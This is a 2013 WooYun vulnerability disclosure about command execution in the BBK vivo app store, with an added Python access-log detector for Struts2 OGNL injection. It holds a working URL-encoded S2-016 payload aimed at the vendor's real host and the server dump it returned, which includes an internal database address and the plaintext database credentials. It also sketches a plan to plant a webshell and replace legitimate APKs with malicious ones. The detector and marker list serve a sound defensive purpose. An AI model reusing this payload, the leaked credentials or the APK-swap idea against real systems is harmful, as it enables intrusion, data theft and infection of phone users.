
Vulnerability summary

Defect ID: wooyun-2013-045237

Title: Command execution vulnerability in the BBK vivo app store

Vendor: BBK (步步高)

Author: j2ck3r

Submitted: 2013-12-07 18:34

Fix deadline: 2014-01-21 18:34

Published: 2014-01-21 18:34

Vulnerability type: System/service patches not applied in time

Severity: Medium

Self-assessed rank: 5

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org. For questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2013-12-07: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed
2014-01-21: The vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Command execution vulnerability in the BBK vivo app store

Detailed description:

Command execution vulnerability in the BBK vivo app store

Proof of vulnerability:

While browsing the vivo phone app store, I noticed that the download link points to
http://appstore.bbk.com/appinfo/downloadApkFile?id=40439

[image: w1.jpg]


Driven by curiosity, I went to
http://appstore.bbk.com:8080/login.jsp and found that it is the app store's back-end admin page.

[image: w.jpg]


I tried a few weak passwords, but none of them got in.
Looking at how the site was set up, I suspected it used the third-party Struts framework.
So I went back to the download URL from before and tested the Struts vulnerability:
http://appstore.bbk.com/appinfo/downloadApkFile?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
It worked.

[image: w2.jpg]


Web root physical path: /opt/app/appstore/appconsole
java.home: /usr/java/jdk1.6.0_26/jre
java.version: 1.6.0_26
os.name: Linux
os.arch: amd64
os.version: 2.6.18-308.16.1.el5
user.name: appstore
user.home: /home/appstore
user.dir: /opt/app/appstore/apache-tomcat-6.0.32/bin
java.class.version: 50.0
java.class.path: /opt/app/appstore/apache-tomcat-6.0.32/bin/bootstrap.jar
java.library.path: /usr/java/jdk1.6.0_26/jre/lib/amd64/server:/usr/java/jdk1.6.0_26/jre/lib/amd64:/usr/java/jdk1.6.0_26/jre/../lib/amd64:/usr/java/packages/lib/amd64:/usr/lib64:/lib64:/lib:/usr/lib
file.separator: /
path.separator: :
java.vendor: Sun Microsystems Inc.
java.vendor.url: http://java.sun.com/
java.vm.specification.version: 1.0
java.vm.specification.vendor: Sun Microsystems Inc.
java.vm.specification.name: Java Virtual Machine Specification
java.vm.version: 20.1-b02
java.vm.vendor: Sun Microsystems Inc.
java.vm.name: Java HotSpot(TM) 64-Bit Server VM
java.specification.version: 1.6
java.specification.vender:
java.specification.name: Java Platform API Specification
java.io.tmpdir: /opt/app/appstore/apache-tomcat-6.0.32/temp
Hibernate information
-- listing properties --
java.vendor=Sun Microsystems Inc.
show_sql=false
sun.java.launcher=SUN_STANDARD
catalina.base=/opt/app/appstore/apache-tomcat-6.0.32
hibernate.connection.url=jdbc:mysql://10.2.2.121:3307/appstore...
sun.management.compiler=HotSpot 64-Bit Tiered Compilers
catalina.useNaming=true
os.name=Linux
sun.boot.class.path=/usr/java/jdk1.6.0_26/jre/lib/resourc...
java.util.logging.config.file=/opt/app/appstore/apache-tomcat-6.0.3...
hibernate.c3p0.max_size=12
java.vm.specification.vendor=Sun Microsystems Inc.
java.runtime.version=1.6.0_26-b03
hibernate.c3p0.min_size=5
user.name=appstore
shared.loader=
tomcat.util.buf.StringCache.byte.enabled=true
hibernate.session_factory_name=sf
hibernate.c3p0.timeout=30
user.language=en
java.naming.factory.initial=org.apache.naming.java.javaURLContext...
sun.boot.library.path=/usr/java/jdk1.6.0_26/jre/lib/amd64
dialect=org.hibernate.dialect.MySQLDialect
java.version=1.6.0_26
java.util.logging.manager=org.apache.juli.ClassLoaderLogManager
user.timezone=Asia/Shanghai
sun.arch.data.model=64
java.endorsed.dirs=/opt/app/appstore/apache-tomcat-6.0.3...
sun.cpu.isalist=
sun.jnu.encoding=UTF-8
file.encoding.pkg=sun.io
package.access=sun.,org.apache.catalina.,org.apache....
file.separator=/
java.specification.name=Java Platform API Specification
java.class.version=50.0
user.country=US
java.home=/usr/java/jdk1.6.0_26/jre
java.vm.info=mixed mode
os.version=2.6.18-308.16.1.el5
hibernate.transaction.factory_class=org.hibernate.transaction.JDBCTransac...
path.separator=:
java.vm.version=20.1-b02
hibernate.connection.password=appstore
java.awt.printerjob=sun.print.PSPrinterJob
sun.io.unicode.encoding=UnicodeLittle
hibernate.connection.username=appstore
package.definition=sun.,java.,org.apache.catalina.,org.a...
java.naming.factory.url.pkgs=org.apache.naming
user.home=/home/appstore
java.specification.vendor=Sun Microsystems Inc.
java.library.path=/usr/java/jdk1.6.0_26/jre/lib/amd64/s...
java.vendor.url=http://java.sun.com/
hibernate.connection.driver_class=com.mysql.jdbc.Driver
java.vm.vendor=Sun Microsystems Inc.
hibernate.dialect=org.hibernate.dialect.MySQLDialect
common.loader=${catalina.base}/lib,${catalina.base}...
java.runtime.name=Java(TM) SE Runtime Environment
sun.java.command=org.apache.catalina.startup.Bootstrap...
java.class.path=/opt/app/appstore/apache-tomcat-6.0.3...
hibernate.bytecode.use_reflection_optimizer=false
java.vm.specification.name=Java Virtual Machine Specification
java.vm.specification.version=1.0
catalina.home=/opt/app/appstore/apache-tomcat-6.0.32
sun.cpu.endian=little
sun.os.patch.level=unknown
hibernate.connection.provider_class=org.hibernate.connection.C3P0Connecti...
java.io.tmpdir=/opt/app/appstore/apache-tomcat-6.0.3...
java.vendor.url.bug=http://java.sun.com/cgi-bin/bugreport...
server.loader=
os.arch=amd64
java.awt.graphicsenv=sun.awt.X11GraphicsEnvironment
java.ext.dirs=/usr/java/jdk1.6.0_26/jre/lib/ext:/us...
user.dir=/opt/app/appstore/apache-tomcat-6.0.3...
hibernate.c3p0.idle_test_period=15
line.separator=
java.vm.name=Java HotSpot(TM) 64-Bit Server VM
hibernate.c3p0.acquire_increment=2
file.encoding=UTF-8
java.specification.version=1.6
hibernate.c3p0.max_statements=100
hibernate.show_sql=false
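The request above abuses the `redirect:` parameter prefix, which the Struts 2 action mapper evaluated as an OGNL expression before Struts 2.3.15.1 (S2-016); the lasting fix is upgrading Struts, and the leaked Hibernate properties show why the blast radius includes the database credentials. The following detector is an added example, not code from the original report or from the vendor: it scans Tomcat-style access log lines for the signs of this class of request (an action-mapper prefix followed by `${` or `%{`, and OGNL context/class markers in the decoded query string). The log format, the sample lines and the client addresses are constructed for the example; the second sample line reuses the request URL shown in the report above.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line inside a Tomcat common/combined access log entry: "GET /path?query HTTP/1.1"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD|PUT) (\S+) HTTP/')

# Before Struts 2.3.15.1 the DefaultActionMapper evaluated the "redirect:",
# "redirectAction:" and "action:" parameter prefixes as OGNL (S2-016).
PREFIX_RE = re.compile(r"^(?:redirect|redirectAction|action):[$%]\{", re.IGNORECASE)

# Substrings that have no place in a legitimate query string of this application.
OGNL_MARKERS = (
    "#context.get(",
    "com.opensymphony.xwork2",
    "#_memberAccess",
    "@java.lang.Runtime@",
    ".getWriter(",
)


def decode_fully(s, max_rounds=3):
    """Percent-decode until the string stops changing, so double encoding is not a bypass."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_url(url):
    """Return the list of OGNL-injection indicators found in one request URL (empty if clean)."""
    query = decode_fully(urlsplit(url).query)
    findings = []
    for param in query.split("&"):
        if PREFIX_RE.match(param.strip()):
            findings.append("action-mapper prefix followed by an OGNL expression")
            break
    for marker in OGNL_MARKERS:
        if marker in query:
            findings.append(f"marker {marker!r}")
    return findings


def scan_access_log(lines):
    """Return (line_number, url, findings) for every log line that trips a rule."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        findings = scan_url(m.group(1))
        if findings:
            hits.append((n, m.group(1), findings))
    return hits


# Constructed sample log: a normal download, the request from the report, a normal login page hit.
SAMPLE_LOG = [
    '10.0.0.5 - - [07/Dec/2013:18:20:01 +0800] "GET /appinfo/downloadApkFile?id=40439 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [07/Dec/2013:18:21:37 +0800] "GET /appinfo/downloadApkFile?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D HTTP/1.1" 200 41',
    '10.0.0.5 - - [07/Dec/2013:18:22:10 +0800] "GET /login.jsp HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for line_no, url, findings in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: {url[:60]}...")
        for f in findings:
            print(f"    - {f}")
```

Run over a real access log, only the second kind of line is reported, with the prefix rule and three markers. The decoder loop matters because Tomcat logs the URL as received, so a double-encoded payload would otherwise slip past substring matching; in an estate that cannot upgrade immediately, the same rules can be placed in a reverse proxy or WAF in front of the application, but they are a stopgap and not a substitute for the Struts fix.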


Did you think that was it? Suddenly an evil idea came to mind: upload a webshell and replace the site's legitimate APK files with APK files carrying malicious code; any phone user who downloads them gets infected.
This is only an idea; I did not test it, as the harm would be too great.

Fix:

You know what to do. Gifts welcome!

Copyright notice: when republishing, please credit the source j2ck3r@WooYun


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively declined